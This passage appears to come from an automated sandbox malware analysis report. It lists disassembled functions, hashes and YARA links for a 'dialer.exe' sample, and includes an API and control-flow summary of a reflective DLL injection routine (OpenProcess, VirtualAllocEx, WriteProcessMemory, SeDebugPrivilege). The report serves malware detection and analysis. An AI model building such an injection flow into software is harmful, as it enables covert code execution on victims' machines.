                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 234e253313b7caa99f7852d6a1ee282cefa2001cf85899d640efb4dc8f98a28c
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 67118632A10F5151F66C1568E4553F551816BFC3B8F582AB4BF76076DECBE6C8C16300
                                                                          Function 000001160CA6F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: 40ce274906cf45444f6acfa71e6c77bcdfd3c2569db1d0924d81cc190aa8b7ad
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 2861AF72600B408AFA6D9BACFD443EA67A1F78D784F514595FF4A077ACDA36C8C68700
                                                                          Function 000001160CA9AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: a54b180e1825f259867276b75912e54126220ed59de397486db85666662ac1cb
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: EB617A33600B888AEB28DFA5D4813DD77B0F348B88F044256EF4A17B98DB3AD995C700
                                                                          Function 000001160CA6A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 0d3f649f3e214bf1ad3b67a947e903f0fb44eb02b02186e1919c71ddb1229bee
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 36518236100B80CAEB788F2995443D977A0F359B98F184255FF99A7BD9CB3AD8D1D700
                                                                          Function 000001160CA9AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 7e1fb8fdabdebb0689bf3c3404f30a21e962d6697f5bd71d6188b06412b45dbd
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 1E518D721007808AEB688F2595863D977A0F359B85F185156FF9A47BD9CB3BD8D0D700
                                                                          Function 000001160CA68405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: 511292130ba11b18e6ec435e9b9489d8c9b6dd49d0b852a9a64ee7ca7a2fa1f3
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: E751AB72602B008AEB19CB29E444BD93799F358B98F5581A5EF16437CCEB7AC8C18704
                                                                          Function 000001160CA683E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 5074665d853f127c4aa43890f70cda479e0123e79606554beef683be19da4394
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: C3316972601B4096EB18DF2AE848BD977A8F348B98F158154FF6A0778CDB3EC980C704
                                                                          Function 000001160CAA2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction ID: 4a6be51de3848e6702e713832d9233cbb7be7e1cc48ffc979ff010895bd085d9
                                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction Fuzzy Hash: 02D1BD72714B808AE719CFA9D4403EC3BB1E398798F148256EF5E97B99DB36C496C340
                                                                          Function 000001160CA914A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: 5a4cccb55fb742b62dc734b8e0df6b208cc7dbaed8a3dc776fd4d6eed8ebf3d7
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: B1012536600F90C6E708DB66A9041DAABA0F78CB81F084425FF5A43729DF39C0918B40
                                                                          Function 000001160CAA2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction ID: 431a759050d179949e483925ef2424d29c30973842a17244e412dcbf38dff4d6
                                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction Fuzzy Hash: E591AE7271075496FB689F6594843ED2BA0F79CB88F14428AEF0E67A9DDB36C4D2C700
                                                                          Function 000001160CA97960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: 2cd6e4e7066c78cd4db9facb4e75c84f206db304ab82898182781ebb652835db
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: CC111532710F058AEB408B60E8553E833A4F75D768F440E21FF6D86BA9DB79C5A89380
                                                                          Function 000001160CA9253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction ID: 7be1a33af68f3fa142c27885c3340da2d6443656d2c4f068d33aa84f63ab79a6
                                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction Fuzzy Hash: 7B71B53620078195EB6DDF2598463EA67A4F38D784F440256FF0963B9DDE37C585C740
                                                                          Function 000001160CA69E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: e7b6a842bf8d32be560e08983c46cfe544e9b3cf3ecfba2c55d2003a00bb49b2
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: D5614637A00F848AEB28DF69E4803DE77A0F748B88F154255EF8917B99DB3AD595C700
                                                                          Function 000001160CA92330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction ID: 9c6cea4bdae0cb2a6801b25d976e615f5eec4524207763dd4bfc951a6191974f
                                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction Fuzzy Hash: 6E51E472204781A1EA7CDB29A4993EA6791F3CD740F440265FF5A43B9EDA3FC9848780
                                                                          Function 000001160CAA26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: 410f1528c0f1169d0e8c37794e18f1a6940184ee8eabb10144613a5658bf0d8f
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 7C41AD72614B8086EB248F65E8443EAB7A0F79CB94F544121FF4E87798EB3EC591CB40
                                                                          Function 000001160CA994A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: 575042b631b71269712c8c11cde695bc973bf8b3a77ab8acaf2560d46d2c1290
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: 16112836214B8082EB658F25E44439AB7E5FB88B94F584264EF8C07B68DF3EC595CB00
                                                                          Function 000001160CA67356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: abf525fd3daf36b883674429ccc3a985a46788f7e6dc3d0c007950352127e432
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: B0E08671A41B4490EF058F61E8402D873A4EB5CB64B489222AE5C46359FA38D1E9C300
                                                                          Function 000001160CA673B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 74fd576b2d3ba4bb534c5b975ecc9e34be97d807d594df3172c2d25d8146ed7d
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: A7E0E671A51B4494DF058F65D8501D873A5E75CB54B889262DE5C46359EA38D1E5C300
                                                                          Function 000001160CA91BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: bd8e8fd0d7fd396850ebe7402d0c179e7b2eb44d2eae185ed36ccf84efb2eafe
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: B2118C35601B8581EA48DB66A8092E977E1FB8DFC0F1840A8EF4D5776ADF3AC482C300
                                                                          Function 000001160CA91268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 869105a1881b30f2dc14e196b85700cdad5a2b022a2c7915137ec73985f912f1
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: 04E03939601B0486EB088B62D80838ABAE1EB8DB06F0880249F0907355DF7E84D9CB50

                                                                          Callgraph

                                                                          Executed Functions

                                                                          Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess$Close$CurrentResource$FileFindSecurityThread$ChangeDescriptorFreeHandleHeapModuleNotificationOpenProtectTokenValueVirtual$AdjustAllocConvertErrorInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                          • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                          • API String ID: 1970497257-1130149537
                                                                          • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                          • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                          • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                          • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                                          Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab FindCloseChangeNotification 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Close$Open$FindHandleInformationToken$AllocAuthorityChangeFileLocalNameNotification$CodeCountErrorExitFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                          • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                          • API String ID: 2998269048-3753927220
                                                                          • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                          • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                          • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                          • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                                          Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memorythreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Heap$AllocEnum$BoundaryChangeCloseDeleteDescriptorFindLanguagesMemoryModulesNotificationOpenPreferredProcessesReadRestoreThread
                                                                          • String ID:
                                                                          • API String ID: 2219672174-0
                                                                          • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                          • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                          • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                          • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                                          Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleModuleProtectVirtual$ChangeCurrentFindFreeInformationLibraryMappingNotificationProcessViewlstrcmpi
                                                                          • String ID: .text$C:\Windows\System32\
                                                                          • API String ID: 1125510917-832442975
                                                                          • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                          • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                          • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
